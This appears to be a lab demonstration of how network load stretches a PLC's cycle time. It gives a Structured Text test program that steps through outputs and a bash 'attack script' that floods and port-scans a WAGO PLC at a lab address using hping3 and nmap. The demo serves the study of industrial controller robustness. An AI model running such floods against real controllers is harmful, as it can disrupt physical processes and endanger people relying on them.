PLC Cycle Time Attack
Demo of how network communication load can influence the cycle time of a PLC. The test program running on the PLC is kept deliberately simple so that a change in cycle time becomes visible at the outputs:
- The default main cyclic task is used.
- The task cycle time is set to 1 ms.
- Every 250 cycles the next output is set, so under an undisturbed 1 ms cycle an output should advance every 250 ms; a longer interval between output changes means the cycle is being stretched by the traffic.
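The following Structured Text program is an added example of the test logic described above; it is not code from the original page or from the PLC vendor. It assumes the program is called from a task configured with a 1 ms cycle in the task configuration (the cycle time is not set in code), that the `outputs` array is mapped to eight physical digital outputs in the device I/O mapping, and that the outputs are set one after another as a running light and cleared when all eight have been set (the page only says "the next output is set").

```iecst
PROGRAM PLC_PRG
(* Added example, not the original page's code.
   Assumption: this program is called by the main cyclic task with a 1 ms cycle.
   Assumption: outputs[0..7] are mapped to eight physical digital outputs. *)
VAR
    cycleCount  : UINT := 0;              (* task cycles since the last output change *)
    outputIndex : UINT := 0;              (* index of the output that is set next *)
    outputs     : ARRAY[0..7] OF BOOL;    (* mapped to physical outputs in the I/O mapping *)
    i           : UINT;
END_VAR

(* One increment per task cycle: 250 cycles = 250 ms at a nominal 1 ms cycle. *)
cycleCount := cycleCount + 1;

IF cycleCount >= 250 THEN
    cycleCount := 0;

    IF outputIndex = 0 THEN
        (* All eight outputs were set in the previous round: clear them and restart. *)
        FOR i := 0 TO 7 DO
            outputs[i] := FALSE;
        END_FOR
    END_IF

    (* Set the next output and advance; wraps to 0 after output 7. *)
    outputs[outputIndex] := TRUE;
    outputIndex := (outputIndex + 1) MOD 8;
END_IF
```

With this program an output changes every 250 ms and a full round over the eight outputs takes 2 s. Timing the output transitions with a logic analyser or scope during the idle phase gives the baseline; if the interval grows while the attack script is generating traffic, the runtime is no longer keeping the 1 ms cycle, which is the effect the demo shows. The runtime's task monitoring (current and maximum cycle time of the task) is a second place to read the same effect.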
Attack on different PLCs
Attack Code
```bash
#!/bin/bash
# Attack Script for WAGO PLC
# Sequence: baseline idle -> hping3 flood -> hping3 with fixed packet interval
#           -> nmap default scan -> nmap full port scan, with idle gaps in between.

# Make sure only root can run our script (hping3 and nmap's raw-socket scans need root)
if [ "$(id -u)" != "0" ]; then
    echo "This script must be run as root" 1>&2
    exit 1
fi

# Check if device is reachable (one ICMP echo, 1000 ms timeout)
echo "====================================="
echo "Check if device is reachable"
fping -c1 -t1000 10.0.0.2 2>/dev/null 1>/dev/null
if [ "$?" = 0 ]
then
    echo "Host reachable"
else
    echo "Host not reachable"
    exit 1
fi

# Idle: baseline cycle time without any generated traffic
echo "====================================="
echo "Idle for 20s"
sleep 20s
read -p "Press Enter for flooding..."

# Flooding full: hping3 sends packets as fast as possible, without waiting for replies
echo "====================================="
echo "Hping3 flood for 20s"
echo "hping3 --flood 10.0.0.2"
timeout 20 hping3 --flood 10.0.0.2 &> /dev/null

# Idle 5s
echo "====================================="
echo "Idle for 5s"
sleep 5s
read -p "Press Enter for hping3 with delay..."

# Hping with delay: -i u1100 waits 1100 microseconds between packets (roughly 900 packets/s)
echo "====================================="
echo "Hping3 with delay between packets for 20s"
echo "hping3 -i u1100 10.0.0.2"
timeout 20 hping3 -i u1100 10.0.0.2 &> /dev/null

# Idle 5s
echo "====================================="
echo "Idle for 5s"
sleep 5s
read -p "Press Enter for standard nmap..."

# Standard nmap scan: default scan of the 1000 most common TCP ports, cut off after 20 s
echo "====================================="
echo "Standard nmap scan for a maximum of 20s"
echo "nmap 10.0.0.2"
timeout 20 nmap 10.0.0.2 &> /dev/null

# Idle 5s
echo "====================================="
echo "Idle for 5s"
sleep 5s
read -p "Press Enter for full port scan..."

# Standard nmap full port scan: all 65535 TCP ports, cut off after 20 s
echo "====================================="
echo "Standard nmap full port scan for a maximum of 20s"
echo "nmap -p- 10.0.0.2"
timeout 20 nmap -p- 10.0.0.2 &> /dev/null

# End
echo "====================================="
echo "End of script"
read -p "Press Enter to exit..."
```